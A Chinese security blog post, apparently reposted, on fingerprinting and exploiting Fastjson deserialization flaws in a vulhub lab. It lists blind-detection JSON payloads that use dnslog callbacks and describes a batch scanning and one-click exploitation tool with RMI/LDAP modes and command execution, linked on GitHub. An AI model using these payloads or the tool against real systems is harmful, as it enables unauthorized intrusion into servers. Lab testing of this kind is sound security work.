Fastjson批量检查及一键利用工具
0x01 序章
上次講解過手動利用fastjson,但講的過于太簡單了。根據(jù)大家的反應(yīng),收集如下幾個問題。
1、如何盲打fastjson
2、判斷fastjson的指紋
3、各版本payload以及使用ldap模式監(jiān)聽。
下面我就一一解答,我只是把我在網(wǎng)上查到的資料消化 后分享給大家,如果有大佬覺得哪里不對,還望不吝賜教。這次還帶來了一鍵利用及檢測工具,鏈接在文末。
注:本文僅用于技術(shù)討論與研究,嚴禁用于任何違法用途,違者后果自負
0x02 環(huán)境搭建
這個不用多說了吧,使用vulhub搭建。
啟動fastjson:1.2.24或者fastjson:1.2.45都可以。
判斷fastjson:
無特殊配置情況下fastjson,無正確的閉合會報錯,返回結(jié)果里有fastjson字樣。
從上圖可以看出,我們使用了一個花括號,fastjson處理json時會返回報錯信息。
有的小伙伴就問了,如果是配置了不返回報錯信息怎么辦?那這種情況就只有利用dnslog盲打了。
這里有個小技巧就是,如果你批量檢查或者自己的dnslog,里面有很多記錄。你可以這樣使用'baidu'.d1flzs.dnslog.cn,在dnslog前面加個名稱
盲打payload:
1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}
1.2.67版本后payload
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
0x03 工具使用
下面講解工具使用,這是通過GitHub上大佬工具改造的。
支持rmi及l(fā)dap兩種模式
參數(shù)介紹:
? -h, --help?????????????? //查看幫助
? -u, --url????????????????? //漏洞url
? -c, --commamd???? //執(zhí)行命令
? -m, --mode?????????? //選擇執(zhí)行模式(可選),1:ldap模式(默認);2:rmi模式
演示效果(dnslog):
演示效果(創(chuàng)建文件):
0x04 批量檢測
工具鏈接:
https://github.com/mrknow001/fastjson_rec_exploit
總結(jié)
以上是生活随笔為你收集整理的Fastjson批量检查及一键利用工具的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: jexboss工具 -- JBOSS未授
- 下一篇: routersploit简单实例